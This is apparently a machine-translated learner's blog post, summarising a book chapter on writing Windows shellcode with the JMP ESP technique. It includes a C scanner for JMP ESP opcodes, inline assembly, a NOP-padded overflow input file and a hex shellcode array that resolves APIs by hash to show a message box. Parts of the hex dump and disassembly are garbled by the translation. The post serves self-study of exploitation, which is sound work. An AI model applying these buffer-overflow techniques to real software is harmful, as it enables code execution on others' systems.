"0day Shellcode Authoring Art"--jmp ESP, dynamic get API. Subsequent: encoding, compression

Source: Internet
Author: User

This is the main hand to understand the writing shellcode is not easy. Really not easy, look at the author's code, all feel that they have nowhere to start. The need for the underlying principle of knowledge is also very much need to add up.

Intend to gradually add later. At this stage, jmp ESP is understood. The subsequent dynamic fetch API was faulted on the host. The problem is similar to searching for the JMP ESP code, which creates a problem with unauthorized access. Later, we will continue to solve the problem.

Now tidy up the whole idea.

1, the concept of shellcode, Expoit;

2, in order to better inject shellcode, milestone method. Use JMP esp.

3, follow-up: Dynamic access to API, encoding shellcode, compression shellcode.

Subsequent content is used later to learn.

1, shellcode, exploit concept

Shellcode: The code that is the implant process in a buffer overflow attack.

Exploit: The process of code implantation becomes exploit, that is, exploit.

2. Milestone Injection Method: JMP ESP

One of our previous ideas was to inject shellcode into the buffer. The return address is modified by overflow, which points to the starting position of the buffer to execute shellcode.

But there is a downside to this. At present, the return address of the overflow modification is fixed, if the system restarts, or re-run the program, the assigned address will change, the original shellcode will not be, need to look at the OD address, modify the address. This is not convenient. This problem has plagued people a long time later, in 1998, the hacker organization "Cult of the Dead Cow" Dildog for the first time proposed the use of JMP ESP dynamic positioning, as the Shellcode milestone progress.

In 98, I was a little boy. The world outside is already surging.

Using the JMP ESP has this principle. Each time the current function returns, the ESP will point to the top of the stack next to the stack frame. Then, by placing the shellcode behind the return address, it can be executed dynamically.

(In fact, I consider whether I can get the starting address of the current buffer directly in the Shellcode, and then dynamically put it in the return address, but found the difficulty, and trouble, the amount of code will increase a lot.) The revolutionary progress is really great! )

The current problem is the JMP ESP directive that searches for memory through code. Using the OD plug-in can be successful, but your own design program is never found.

Uer32.dll find 0x1000 A byte said ultra vires, do not understand why, the difficulty of the current windows to control this?

The OD plug-in is finally released.

Write your own code (in the book) after the modification, you can run in the VS2010.

#include "stdafx.h" #include <stdio.h> #include <windows.h> #define DLL_NAME "kernel32.dll" int _tmain (int ARGC, _tchar* argv[]) {BYTE *ptr;int position,address; HINSTANCE handle; BOOL Done_flag = False;handle = LoadLibraryA (Dll_name), if (!handle) {printf ("Load DLL error!"); GetChar (); return 0;} ptr = (byte*) handle;printf ("Start at 0x%x\n", handle); for (position = 0;!done_flag; position++) {__try{if (ptr[position] = = 0xFF && ptr[position+1] = = 0xE4) {address = (int) ptr + position;printf ("jmp esp found at 0x%x\n", address);}} __except (2) {address = (int) ptr + position;printf ("END of 0x%x\n", address);d One_flag = TRUE;}} GetChar (); return 0;}


Then, using the previous section of the program and password file, construct shellcode injection.

To get Shellcode code to exit safely, find a exitprocess function more than the previous chapter.

Last use OD search, this time use Dependency Walker Find, find the base address of dynamic link library is not accurate. The relative position is accurate.

So I still use the search code above to find the base address, with DK to find the relative position. Get the following address, each computer data is different.

Uesr32  --76ef0000 MESG = 0x0006fd1e   0x76f5fd1e    USER32. MessageBoxA  Kernel32.dll 76bb0000   and  exitprocess= 0x000179d8 exit--0x76bc79d8
Next, write the corresponding assembly code, modify the address in the corresponding location, get the machine code:

Shellcode_usejmp.cpp://#include "stdafx.h" #include <windows.h>int _tmain (int argc, _tchar* argv[]) {hinstance Libhandle,libhandle2; Libhandle = LoadLibraryA ("user32.dll"); LibHandle2 = LoadLibraryA ("kernel32.dll"); _asm{sub sp,0x440xor ebx,ebxpush ebxpush 0x74736577push 0x6c696166mov eax, Esppush ebxpush eaxpush eaxpush ebxmov eax,0x76f5fd1e call Eax//messagebox, modifying push Ebxmov Eax,0x76bc79d8call eax//exit (0) , modify}return 0;}

Get the machine code

013e13cc               66:81ec 4004    Sub     sp, 440013e13d1               33DB            xor     ebx, EBX013E13D3               p              push    EBX013E13D4               77657374     push    74736577013e13d9               6661696C     push    6c696166013e13de               8bc4            mov     eax, esp013e13e0              ebx013e13e1 push    eax013e13e2    eax013e13e3-Push    ebx013e13e4               B8 1efdf576     mov     eax, USER32. Messageboxa013e13e9               FFD0            call    eax013e13eb               -              push    ebx013e13ec               B8 d879bc76     mov     eax, kernel32. EXITPROCESS013E13F1               FFD0            call    eax

The TXT document written to the construct is:

00000000H:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90; 悙 悙 悙 悙 悙 悙 悙 悙 00000010h:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90; 悙 悙 悙 悙 悙 悙 悙 悙 00000020h:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90; 悙 悙 悙 悙 悙 悙 悙 悙 00000030h:90 4F AE F8 76, all 悙 悙 悙 悙 悙 悙 ov00000040h:33 DB (53) 6C 8B C4 3 跾 hwesthfail 嬆 s00000050h:50-B8 1E FD F5-FF D0-B8 D8-BC 76; Pps?v Village Anus y Shadow 00000060h:ff D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90; Ð 悙 悙 悙 悙 悙 悙? 00000070h:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90; 悙 悙 悙 悙 悙 悙 悙 悙 00000080h:90, All-in-a-all-through-all-the-all-over-all, 悙 悙 悙 悙 悙 悙    悙?


Final run successfully pops up: and exits safely


3, dynamic access API, encoding shellcode, compression shellcode

This part will not be elaborated, because I want to follow up back to study. Most of the code involved I can not modify.

Describe a small number of steps:

"1, get the hash of the API"
messageboxa:0x1e380a6a
exitprocess:0x4fd18963
loadlibrarya:0x0c917432

The purpose of obtaining a hash is to shorten the string's comparison length.

"2, directly loading the code on the book, Run Get Machine code"


"3, the machine code to the array storage"

Char popup_general[]= "\xfc\x68\x6a\x0a\x38\x1e\x68\x63\x89\xd1\x4f\x68\x32\x74\x91\x0c" "\x8B\xF4\x8D\x7E\xF4\ X33\xdb\xb7\x04\x2b\xe3\x66\xbb\x33\x32\x53 "" \x68\x75\x73\x65\x72\x54\x33\xd2\x64\x8b\x5a\x30\x8b\x4b\x0c\x8b " "\x49\x1c\x8b\x09\x8b\x69\x08\xad\x3d\x6a\x0a\x38\x1e\x75\x05\x95" "\xff\x57\xf8\x95\x60\x8b\x45\x3c\x8b\x4c\ X05\x78\x03\xcd\x8b\x59 "" \x20\x03\xdd\x33\xff\x47\x8b\x34\xbb\x03\xf5\x99\x0f\xbe\x06\x3a "" \xC4\x74\x08\xC1\ Xca\x07\x03\xd0\x46\xeb\xf1\x3b\x54\x24\x1c\x75 "" \xe4\x8b\x59\x24\x03\xdd\x66\x8b\x3c\x7b\x8b\x59\x1c\x03\xdd\ x03 "" \x2c\xbb\x95\x5f\xab\x57\x61\x3d\x6a\x0a\x38\x1e\x75\xa9\x33\xdb "" \x53\x68\x77\x65\x73\x74\x68\x66\x61\ x69\x6c\x8b\xc4\x53\x50\x50 "" \x53\xff\x57\xfc\x53\xff\x57\xf8 ";

At this point, the chapter concludes, feel the first contact difficulty or some.

The main learning knowledge is Shellcode's writing ideas. As well as the entire process, including subsequent coding, compression and other content have a general understanding.

The ultimate goal is to construct a concise, universal, accurate shellcdoe.

The use of jmp ESP is really good.



The next chapter uses Metasploit, very much look forward to!











"0day Shellcode Authoring Art"--jmp ESP, dynamic get API. Subsequent: encoding, compression

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.